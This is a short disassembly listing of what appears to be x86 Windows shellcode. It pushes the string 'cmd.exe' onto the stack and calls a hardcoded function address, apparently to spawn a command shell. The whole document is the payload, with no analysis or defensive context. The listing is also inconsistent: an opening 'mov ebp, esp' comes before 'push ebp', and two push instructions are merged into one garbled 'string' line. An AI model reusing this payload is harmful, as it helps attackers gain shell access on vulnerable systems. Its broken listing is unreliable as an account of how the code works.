0x0        mov ebp, esp                        \x8b\xec                  ..        
0x2        push ebp                            \x55                      U         
0x3        mov ebp, esp                        \x8b\xec                  ..        
0x5        hexe/hcmd. ; string                \x68\x65\x78\x65\x2f\x68\x63\x6d\x64\x2e          
0xf        lea eax, [ebp - 8]                  \x8d\x45\xf8              .E.       
0x12       push eax                            \x50                      P         
0x13       mov eax, 0x77c293c7                 \xb8\xc7\x93\xc2\x77      ....w     
0x18       call eax                            \xff\xd0                  ..        
